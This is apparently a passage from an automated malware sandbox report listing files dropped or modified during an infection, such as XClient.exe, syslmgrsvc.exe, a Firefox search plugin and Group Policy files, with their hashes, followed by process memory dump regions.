MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
C:\Users\Admin\AppData\Local\Temp\main\KillDuplicate.cmdFilesize
222B
MD568cecdf24aa2fd011ece466f00ef8450
SHA12f859046187e0d5286d0566fac590b1836f6e1b7
SHA25664929489dc8a0d66ea95113d4e676368edb576ea85d23564d53346b21c202770
SHA512471305140cf67abaec6927058853ef43c97bdca763398263fb7932550d72d69b2a9668b286df80b6b28e9dd1cba1c44aaa436931f42cc57766eff280fdb5477c
-
C:\Users\Admin\AppData\Local\Temp\tmp3A.tmp.batFilesize
148B
MD5046dabc8984476817d34333b35a06b59
SHA1b07eac307ce078ef39f7c5e70b2c350a8be780ea
SHA25641a158698a69faa17362f33f0318bc848984984635d7a01163c7e9aad01c03d8
SHA512f2cfefd70312f0e9cee21cae13fe446668244221acf6281807dfcd52b1ea03044a8b13452394114e10680b713b7927a1b9ebbdf67b4d5df4bedefd51463b8b9d
-
C:\Users\Admin\AppData\Local\Temp\{ED903FEA-671B-40fb-A83E-18E2594AB462}.tmp\360P2SP.dllFilesize
824KB
MD5fc1796add9491ee757e74e65cedd6ae7
SHA1603e87ab8cb45f62ecc7a9ef52d5dedd261ea812
SHA256bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60
SHA5128fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\prefs.jsFilesize
8KB
MD54d6f739198cb62cfa485518e2148e3ef
SHA1a4600c282f77e8b6ae4d15a68c18cfd11b1f8aca
SHA2564d9aedd7751f91fbec19bdd459d131ace25047bf287e6f26720e7c68efea3fb3
SHA51290800d1cead45c516b38951b6a0c204d4723aa5b59354958c7ece614cbe2fb70fc89a3ca4921b188875ace4d39fa6030d128545bf48f01010e4dfed16c14aced
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\searchplugins\cdnsearch.xmlFilesize
1KB
MD52869f887319d49175ff94ec01e707508
SHA1e9504ad5c1bcf31a2842ca2281fe993d220af4b8
SHA25649dd61e19d4541f1e695b66847d0bf99bc08952ba41b33a69c2e297dfa282d15
SHA51263673c1ede47fda14dea78483c6319132a849db3b35953e43704aa49cfb6d14e42d74e0eaf93f4cdb7632c85f368d484ac111687127d2b87a3e264949085c76b
-
C:\Users\Admin\Pictures\9BoTZ4mQ4Mm98OP5R3AdP93M.exeFilesize
7KB
MD577f762f953163d7639dff697104e1470
SHA1ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499
-
C:\Users\Admin\Pictures\AIrj5QVEYuGuBGBtXUl948x8.exeFilesize
259KB
MD56b95f92d87e9eebacab03cc523d8733f
SHA1d2ceb1939fd73e13d83ab98673f6c571560c9e63
SHA2560c57cba31bd9c3703f929e9f856cafc33a14c7142d49f171e9f4438930a56d7b
SHA512d7f511d489b2627435ab593545083bed24753baef3ca43e16a83d444f5e281d52f5e7d47204ec51cb2ee183564393dfabf4c9b716ecd2bae11579aa1b36a2bc3
-
C:\Users\Admin\Pictures\an4IhMEUJGaXcuvcgGd8PX9U.exeFilesize
1.5MB
MD5cd4acedefa9ab5c7dccac667f91cef13
SHA1bff5ce910f75aeae37583a63828a00ae5f02c4e7
SHA256dd0e8944471f44180dd44807d817e0b8a1c931fc67d48278cdb7354d98567e7c
SHA51206fae66da503eb1b9b4fbe63a5bb98c519a43999060029c35fe289e60b1cb126a6278c67ce90f02e05b893fcaea6d54f9deb65bc6da82561487a7754f50c93d1
-
C:\Users\Admin\Pictures\i4NmxEpmuAkauKUZZPpG91uN.exeFilesize
6.6MB
MD553d14bd638c98c210e391151a8d3bccc
SHA1b3521f13e3c43295dfa291d5b047372ddc3c1a8b
SHA2561fb6d951265c037103aa2165a5cbf19961fd3ef1ff8017e461682b6666ce3898
SHA5120c02d70eb04c5618ccf9ac500bec427cbcd3a26e54567535c0b4b19c8d3ab6b04c8ee893a3e0da7861cfca0c652b330ac682f8eae091b225f2a824723bc5b568
-
C:\Users\Admin\Pictures\nO20MXBUGloxh9agdli788Vc.exeFilesize
6.3MB
MD51306e81bc13677c04abe69a1d2ca4e12
SHA171e0de1475bbdfd9d244613d733ef33cf531e89c
SHA2569cec62fb802376768ad3fc73ef78aa6f2d34ec683696e597536ebe2b5fcb798d
SHA512413f356c8f556e720b0677d88e1d4328a21983e6ffc0f1c49ac19bde9df5e787409e2d7520e557ee7eeee39377140bc2a756aa2eb959c7b397ac3a7b124f86f2
-
C:\Users\Admin\XClient.exeFilesize
40KB
MD57ea387ab126b2ecf3365d448a318a433
SHA171b6e05898b68ed72ca95266d6293b225c40b612
SHA256573f3d316ed68ea2d4762a657dcc62416b763a8fcd1f99017f02d3ef5c215015
SHA51268830f84bf9f0a9e75a999907f7e7d816f89aa745e92078f56f303edadb236e14957e0594290f297fd4c0175ae72be02542cabe974a404fe961b7ab4bf945825
-
C:\Users\Admin\example.exeFilesize
673KB
MD556a9b5d3e447355a8d29a2d02a00b70c
SHA1af802aab037d6ae208b040e4e0b629665f208394
SHA2568d33c98d8aa62cbcc5d9096aa93fe073f0ee012af6cea9f19daad0d8e08d0ff1
SHA512c9d4de01e7c472d48ecee70777cac1f3ab3959fdb863c27096898b339e5f53e319489080ca08d3b18659ab396a16a18638fbebe06e58546ddeb2b5b5ca593081
-
C:\Windows\System32\GroupPolicy\Machine\Registry.polFilesize
9KB
MD59c156a1cef3670ea9c6819b74177265f
SHA1eab86e2961b758f117f2f6a6921e9377771b46aa
SHA2561841f10109341596af499d6169502197467c78f9f0302484c49bc41e01cb0bb6
SHA512f181d87a2dae6df704f6ee2b15524e45ecb4e0a919d54ce6d55f5befef6f74dcd48a170761e74c5c6b0f61efd388b072fec12034a8a3ce05a1ff7c5303b65c42
-
C:\Windows\System32\GroupPolicy\gpt.iniFilesize
127B
MD58ef9853d1881c5fe4d681bfb31282a01
SHA1a05609065520e4b4e553784c566430ad9736f19f
SHA2569228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA5125ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005
-
C:\Windows\System32\GroupPolicy\gpt.iniFilesize
127B
MD57cc972a3480ca0a4792dc3379a763572
SHA1f72eb4124d24f06678052706c542340422307317
SHA25602ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5
SHA512ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7
-
C:\Windows\syslmgrsvc.exeFilesize
93KB
MD5a318cc45e79498b93e40d5e5b9b76be4
SHA14ebc9969cc3c330741c377e22a5fb0cdb8ce5fd5
SHA2564b4e596641d0dd9eece8a24556fd1246056cbc315a79675a7400927858bbd7c2
SHA5123131d627837a3cafdf532173ccadd4beff933ee3d5e050366153434b1394c4d57056b4d273ddb826a1a0478caa83e1f6e095e83366102ae1d3705ab2d3ec0e2c
-
memory/368-352-0x0000023A67E20000-0x0000023A67E42000-memory.dmpFilesize
136KB
-
memory/1016-1003-0x0000000005630000-0x000000000563C000-memory.dmpFilesize
48KB
-
memory/1016-1083-0x0000000006960000-0x00000000069E4000-memory.dmpFilesize
528KB
-
memory/1016-997-0x0000000000A80000-0x0000000000B44000-memory.dmpFilesize
784KB
-
memory/1016-1002-0x0000000005850000-0x0000000005872000-memory.dmpFilesize
136KB
-
memory/1016-1082-0x0000000002B90000-0x0000000002BA0000-memory.dmpFilesize
64KB
-
memory/1060-360-0x0000000000400000-0x0000000000408000-memory.dmpFilesize
32KB
-
memory/1216-2525-0x0000000007B20000-0x0000000007B34000-memory.dmpFilesize
80KB
-
memory/1216-2449-0x00000000066F0000-0x000000000673C000-memory.dmpFilesize
304KB
-
memory/1216-2528-0x0000000007C00000-0x0000000007C1A000-memory.dmpFilesize
104KB
-
memory/1216-2529-0x0000000007B50000-0x0000000007B58000-memory.dmpFilesize
32KB
-
memory/1216-2524-0x0000000007B10000-0x0000000007B1E000-memory.dmpFilesize
56KB
-
memory/1216-2472-0x000000006DB60000-0x000000006DBAC000-memory.dmpFilesize
304KB
-
memory/1216-2491-0x0000000007AD0000-0x0000000007AE1000-memory.dmpFilesize
68KB
-
memory/1216-2487-0x0000000007940000-0x000000000794A000-memory.dmpFilesize
40KB
-
memory/1216-2485-0x0000000007F20000-0x000000000859A000-memory.dmpFilesize
6.5MB
-
memory/1216-2471-0x0000000007730000-0x0000000007762000-memory.dmpFilesize
200KB
-
memory/1216-2483-0x00000000077A0000-0x0000000007843000-memory.dmpFilesize
652KB
-
memory/1216-2482-0x0000000007770000-0x000000000778E000-memory.dmpFilesize
120KB
-
memory/1280-861-0x0000000000FD0000-0x0000000000FE0000-memory.dmpFilesize
64KB
-
memory/1928-1081-0x0000000000B10000-0x000000000117E000-memory.dmpFilesize
6.4MB
-
memory/1928-2130-0x0000000000B10000-0x000000000117E000-memory.dmpFilesize
6.4MB
-
memory/1928-627-0x0000000000B10000-0x000000000117E000-memory.dmpFilesize
6.4MB
-
memory/2284-255-0x00000000065B0000-0x00000000065EC000-memory.dmpFilesize
240KB
-
memory/2284-244-0x0000000005CB0000-0x0000000005D26000-memory.dmpFilesize
472KB
-
memory/2284-256-0x0000000006720000-0x000000000676C000-memory.dmpFilesize
304KB
-
memory/2284-254-0x0000000006550000-0x0000000006562000-memory.dmpFilesize
72KB
-
memory/2284-252-0x0000000006AC0000-0x00000000070D8000-memory.dmpFilesize
6.1MB
-
memory/2284-253-0x0000000006610000-0x000000000671A000-memory.dmpFilesize
1.0MB
-
memory/2284-247-0x0000000006480000-0x000000000649E000-memory.dmpFilesize
120KB
-
memory/2284-217-0x0000000000400000-0x0000000000452000-memory.dmpFilesize
328KB
-
memory/2284-279-0x00000000072E0000-0x0000000007330000-memory.dmpFilesize
320KB
-
memory/2288-1232-0x0000000004650000-0x00000000049A4000-memory.dmpFilesize
3.3MB
-
memory/2288-1247-0x0000000004C80000-0x0000000004CCC000-memory.dmpFilesize
304KB
-
memory/2340-4611-0x000001ACE1A70000-0x000001ACE1A8C000-memory.dmpFilesize
112KB
-
memory/2348-246-0x00000000009F0000-0x00000000009F1000-memory.dmpFilesize
4KB
-
memory/2364-747-0x0000000000400000-0x0000000000442000-memory.dmpFilesize
264KB
-
memory/2580-245-0x0000000000400000-0x000000000046E000-memory.dmpFilesize
440KB
-
memory/2580-280-0x0000000009FE0000-0x000000000A1A2000-memory.dmpFilesize
1.8MB
-
memory/2580-281-0x000000000A6E0000-0x000000000AC0C000-memory.dmpFilesize
5.2MB
-
memory/2676-152-0x0000000000400000-0x0000000002D52000-memory.dmpFilesize
41.3MB
-
memory/2804-130-0x0000000000400000-0x00000000008AC000-memory.dmpFilesize
4.7MB
-
memory/2804-128-0x0000000000400000-0x00000000008AC000-memory.dmpFilesize
4.7MB
-
memory/2804-133-0x0000000000400000-0x00000000008AC000-memory.dmpFilesize
4.7MB
-
memory/3044-797-0x0000000000390000-0x000000000044C000-memory.dmpFilesize
752KB
-
memory/3052-65-0x0000000000400000-0x0000000002C9F000-memory.dmpFilesize
40.6MB
-
memory/3164-270-0x0000000140000000-0x0000000140DF9000-memory.dmpFilesize
14.0MB
-
memory/3164-287-0x0000000140000000-0x0000000140DF9000-memory.dmpFilesize
14.0MB
-
memory/3164-267-0x0000000140000000-0x0000000140DF9000-memory.dmpFilesize
14.0MB
-
memory/3164-271-0x0000000140000000-0x0000000140DF9000-memory.dmpFilesize
14.0MB
-
memory/3164-268-0x0000000140000000-0x0000000140DF9000-memory.dmpFilesize
14.0MB
-
memory/3164-269-0x0000000140000000-0x0000000140DF9000-memory.dmpFilesize
14.0MB
-
memory/3756-151-0x00000000004F0000-0x000000000052F000-memory.dmpFilesize
252KB
-
memory/3756-153-0x00000000004F0000-0x000000000052F000-memory.dmpFilesize
252KB
-
memory/4028-601-0x0000000006A80000-0x0000000006ACC000-memory.dmpFilesize
304KB
-
memory/4028-591-0x0000000006110000-0x0000000006464000-memory.dmpFilesize
3.3MB
-
memory/4108-1211-0x0000000000400000-0x00000000006E2000-memory.dmpFilesize
2.9MB
-
memory/4108-2639-0x0000000000400000-0x00000000006E2000-memory.dmpFilesize
2.9MB
-
memory/4180-164-0x00007FFDD4233000-0x00007FFDD4235000-memory.dmpFilesize
8KB
-
memory/4180-1-0x00007FFDD4233000-0x00007FFDD4235000-memory.dmpFilesize
8KB
-
memory/4180-2-0x00007FFDD4230000-0x00007FFDD4CF1000-memory.dmpFilesize
10.8MB
-
memory/4180-165-0x00007FFDD4230000-0x00007FFDD4CF1000-memory.dmpFilesize
10.8MB
-
memory/4180-0-0x00000000008A0000-0x00000000008A8000-memory.dmpFilesize
32KB
-
memory/4180-155-0x0000000021390000-0x000000002145D000-memory.dmpFilesize
820KB
-
memory/4360-808-0x0000000004860000-0x0000000004BB4000-memory.dmpFilesize
3.3MB
-
memory/4436-51-0x0000000000C40000-0x0000000000C56000-memory.dmpFilesize
88KB
-
memory/4436-126-0x0000000005610000-0x00000000056AC000-memory.dmpFilesize
624KB
-
memory/4444-999-0x0000000000400000-0x0000000000440000-memory.dmpFilesize
256KB
-
memory/4480-1055-0x0000000140000000-0x0000000140C37000-memory.dmpFilesize
12.2MB
-
memory/4480-572-0x0000000140000000-0x0000000140C37000-memory.dmpFilesize
12.2MB
-
memory/4592-1349-0x0000000004340000-0x0000000004694000-memory.dmpFilesize
3.3MB
-
memory/4592-1363-0x00000000049C0000-0x0000000004A0C000-memory.dmpFilesize
304KB
-
memory/4772-145-0x0000000005B00000-0x0000000005B0A000-memory.dmpFilesize
40KB
-
memory/4772-108-0x0000000000E90000-0x0000000000EA6000-memory.dmpFilesize
88KB
-
memory/4772-146-0x00000000066B0000-0x0000000006716000-memory.dmpFilesize
408KB
-
memory/4772-143-0x0000000005EC0000-0x0000000006464000-memory.dmpFilesize
5.6MB
-
memory/4772-144-0x0000000005B10000-0x0000000005BA2000-memory.dmpFilesize
584KB
-
memory/4840-1237-0x00000000001B0000-0x000000000081E000-memory.dmpFilesize
6.4MB
-
memory/4840-1209-0x00000000001B0000-0x000000000081E000-memory.dmpFilesize
6.4MB
-
memory/4840-687-0x00000000001B0000-0x000000000081E000-memory.dmpFilesize
6.4MB
-
memory/4940-2392-0x00000000001D0000-0x00000000001DC000-memory.dmpFilesize
48KB
-
memory/4948-127-0x0000000000140000-0x0000000000141000-memory.dmpFilesize
4KB
-
memory/4948-129-0x0000000000140000-0x0000000000141000-memory.dmpFilesize
4KB
-
memory/5204-558-0x0000000000400000-0x0000000000442000-memory.dmpFilesize
264KB
-
memory/5216-922-0x0000000005940000-0x000000000598C000-memory.dmpFilesize
304KB
-
memory/5276-334-0x00000000005B0000-0x00000000005F2000-memory.dmpFilesize
264KB
-
memory/5372-160-0x0000000000780000-0x0000000000796000-memory.dmpFilesize
88KB
-
memory/5512-1277-0x0000000000B10000-0x000000000117E000-memory.dmpFilesize
6.4MB
-
memory/5512-1235-0x0000000000B10000-0x000000000117E000-memory.dmpFilesize
6.4MB
-
memory/5512-864-0x0000000000B10000-0x000000000117E000-memory.dmpFilesize
6.4MB
-
memory/5684-173-0x00000134AF7B0000-0x00000134AF89A000-memory.dmpFilesize
936KB
-
memory/5920-218-0x0000000000DF0000-0x0000000000DF1000-memory.dmpFilesize
4KB
-
memory/5976-638-0x0000000140000000-0x0000000140C37000-memory.dmpFilesize
12.2MB
-
memory/5976-651-0x0000000140000000-0x0000000140C37000-memory.dmpFilesize
12.2MB
-
memory/6040-1236-0x00000000005C0000-0x0000000000C2E000-memory.dmpFilesize
6.4MB
-
memory/6040-2221-0x00000000005C0000-0x0000000000C2E000-memory.dmpFilesize
6.4MB
-
memory/6180-522-0x00000000061E0000-0x0000000006246000-memory.dmpFilesize
408KB
-
memory/6180-586-0x00000000077A0000-0x0000000007836000-memory.dmpFilesize
600KB
-
memory/6180-513-0x0000000005AB0000-0x00000000060D8000-memory.dmpFilesize
6.2MB
-
memory/6180-571-0x0000000006920000-0x000000000696C000-memory.dmpFilesize
304KB
-
memory/6180-588-0x0000000006D20000-0x0000000006D42000-memory.dmpFilesize
136KB
-
memory/6180-587-0x0000000006CB0000-0x0000000006CCA000-memory.dmpFilesize
104KB
-
memory/6180-512-0x0000000002ED0000-0x0000000002F06000-memory.dmpFilesize
216KB
-
memory/6180-521-0x0000000005A10000-0x0000000005A32000-memory.dmpFilesize
136KB
-
memory/6180-523-0x00000000062C0000-0x0000000006614000-memory.dmpFilesize
3.3MB
-
memory/6180-562-0x00000000067D0000-0x00000000067EE000-memory.dmpFilesize
120KB
-
memory/6312-411-0x0000000000400000-0x0000000000408000-memory.dmpFilesize
32KB
-
memory/6364-859-0x0000000000CB0000-0x0000000000CC0000-memory.dmpFilesize
64KB
-
memory/6428-466-0x0000000000400000-0x0000000002C9F000-memory.dmpFilesize
40.6MB
-
memory/6704-479-0x0000000140000000-0x0000000140DF9000-memory.dmpFilesize
14.0MB
-
memory/6704-496-0x0000000140000000-0x0000000140DF9000-memory.dmpFilesize
14.0MB
-
memory/6704-497-0x0000000140000000-0x0000000140DF9000-memory.dmpFilesize
14.0MB
-
memory/6704-495-0x0000000140000000-0x0000000140DF9000-memory.dmpFilesize
14.0MB
-
memory/6704-509-0x0000000140000000-0x0000000140DF9000-memory.dmpFilesize
14.0MB
-
memory/6704-494-0x0000000140000000-0x0000000140DF9000-memory.dmpFilesize
14.0MB
-
memory/6752-297-0x00007FFDF26F0000-0x00007FFDF26F2000-memory.dmpFilesize
8KB
-
memory/6752-307-0x0000000003430000-0x000000000347E000-memory.dmpFilesize
312KB
-
memory/6752-305-0x0000000003430000-0x000000000347E000-memory.dmpFilesize
312KB
-
memory/6752-304-0x0000000003430000-0x000000000347E000-memory.dmpFilesize
312KB
-
memory/6752-308-0x0000000003430000-0x000000000347E000-memory.dmpFilesize
312KB
-
memory/6752-298-0x00007FF7B6A40000-0x00007FF7B7319000-memory.dmpFilesize
8.8MB
-
memory/6768-1001-0x0000000000400000-0x0000000000440000-memory.dmpFilesize
256KB
-
memory/6824-2225-0x00000000001B0000-0x000000000081E000-memory.dmpFilesize
6.4MB
-
memory/6824-515-0x00000000001B0000-0x000000000081E000-memory.dmpFilesize
6.4MB
-
memory/6824-1006-0x00000000001B0000-0x000000000081E000-memory.dmpFilesize
6.4MB
-
memory/6864-688-0x0000000006000000-0x0000000006354000-memory.dmpFilesize
3.3MB
-
memory/6864-707-0x00000000066E0000-0x000000000672C000-memory.dmpFilesize
304KB
-
memory/6924-1204-0x0000000000400000-0x00000000006E2000-memory.dmpFilesize
2.9MB
-
memory/6956-1137-0x0000000000C10000-0x0000000000C20000-memory.dmpFilesize
64KB
-
memory/7056-1089-0x0000000000400000-0x0000000000848000-memory.dmpFilesize
4.3MB
-
memory/7056-656-0x0000000000400000-0x0000000000848000-memory.dmpFilesize
4.3MB
-
memory/7136-672-0x0000000140000000-0x0000000140004278-memory.dmpFilesize
16KB